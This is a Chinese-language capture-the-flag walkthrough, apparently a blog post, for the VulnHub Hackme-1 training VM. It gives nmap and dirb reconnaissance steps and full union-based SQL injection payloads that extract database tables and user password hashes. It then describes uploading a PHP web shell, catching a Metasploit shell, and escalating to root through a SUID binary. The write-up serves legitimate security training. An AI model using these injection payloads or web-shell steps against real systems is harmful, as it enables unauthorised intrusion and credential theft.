Hackme-1靶机

一、靶场介绍

        1.下载地址:https://www.vulnhub.com/entry/hackme-1,330/

        2.将靶机网络适配器改为仅主机模式

         3. 启动靶机

二、信息收集

1、主机发现

nmap -sn 192.168.139.1/24

2.查看端口开放情况,发现其22、80端口开放   

 nmap 192.168.139.128

 

3.靶机目录扫描 

      dirb http://192.168.139.128

 

三、渗透流程

sql注入

1、登录主页发现登录页面,而且还可以注册用户

 

2.注册用户:admin/123456

3.登录

4.查看是否有sql注入,点击search可以查看所有信息

5.验证sql注入 Windows OS' and 1=1#

Windows OS' and 1=2#由此看出存在字符型(单引号)sql注入

6.判断字段数 Windows OS' order by 3#

Windows OS' order by 4#判断字符数为3

7.判断显示位置-1' union select 1,2,3#

8.查看当前数据库位置-1' union select database(),2,3#

9.查看webapphacking库所有的表 -1' union select group_concat(table_name),2,3 from information_schema.tables where table_schema='webapphacking'#

10.查看users表中所有的列 -1' union select group_concat(column_name),2,3 from information_schema.columns where table_name='users'#

11.查看表中user,password字段数据-1' union select group_concat(user),group_concat(pasword),3 from users#

12.将密码进行MD5解密

四、文件上传

1.使用superadmin用户登录 密码:Uncrackable发现其存在文件上传

  

2.上传phpinfo文件进行验证,发现上传成功

3.尝试上传一句话木马,页面回显空白,上传成功

  

4.尝试使用蚁剑连接

5.Kali生成木马文件

6.将木马文件上传至靶机中

7.kali开启msf监听

8.蚁剑中运行木马文件

9.成功获取shell

10.切换到shell,输入whoami可查看具体信息

11.获取shell后切换到python终端,输入python -c 'import pty;pty.spawn("/bin/bash")'

12.跳转到home/legacy目录下,ls发现 ./touchmenot文件

  

13.输入 ./touchmenot,运行获得root

  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 2
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值